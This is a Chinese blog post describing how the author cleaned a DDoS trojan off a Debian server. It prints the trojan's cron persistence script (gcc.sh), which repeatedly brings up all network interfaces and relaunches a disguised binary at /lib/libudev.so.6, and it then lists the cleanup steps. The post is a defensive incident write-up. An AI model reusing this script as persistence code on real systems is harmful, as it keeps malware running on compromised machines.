Home > 工作 > Debian下木马清除记录

Debian下木马清除记录

 

朋友给我电话,说一台虚拟服务器不停的发包,把内网给网络给占满了。于是上去分析了下,很巧,和公司之前一台阿里云机器中的木马一模一样,进行DDOS攻击。

首先把IP给放入IPTABLES里面DROP掉再说,然后熟悉的节奏抓出源文件干掉,详细可以参照这篇文章:http://www.tuicool.com/articles/vA3QRrn

直接去/etc/cron.hourly/里面找到一个gcc.sh的脚本,然后在/etc/contab里面每3分钟执行一次这个脚本,脚本内容如下:

root@server02:~# cat gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {‘print $1′}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

功能就是不断的启动所有网卡,然后执行libudev.so这个文件。果断删除这个文件…

咦,删掉又出来了?没关系,rm –fr libudev.so*;touch libudev.so;chattr +i libudev.so 这下总没辙了把!再杀掉对应进程观察了下,果然没有新的进程起来了,然后网络也恢复了正常。

安全一点再find一把,把相应文件给全部干掉。然后再把服务器密码给改了,因为一问朋友,果然用来弱口令…

原创文章,转载请注明: 转载自三叶草

本文链接地址:http://www.anjing.me/1524.html

特别声明:商业网站转载需经作者同意,否则视为侵权!

相关日志

POSTED ON 2015/11/08, , ,

Comments:2

Leave my own
  1. #1 phenix3443
    16/08/29 回复

    你好久没有更新博客了啊,干嘛去了

    • #2 三叶草
      16/09/20 回复

      宝宝出生了…没时间管理这个咯

Leave a Reply

TOP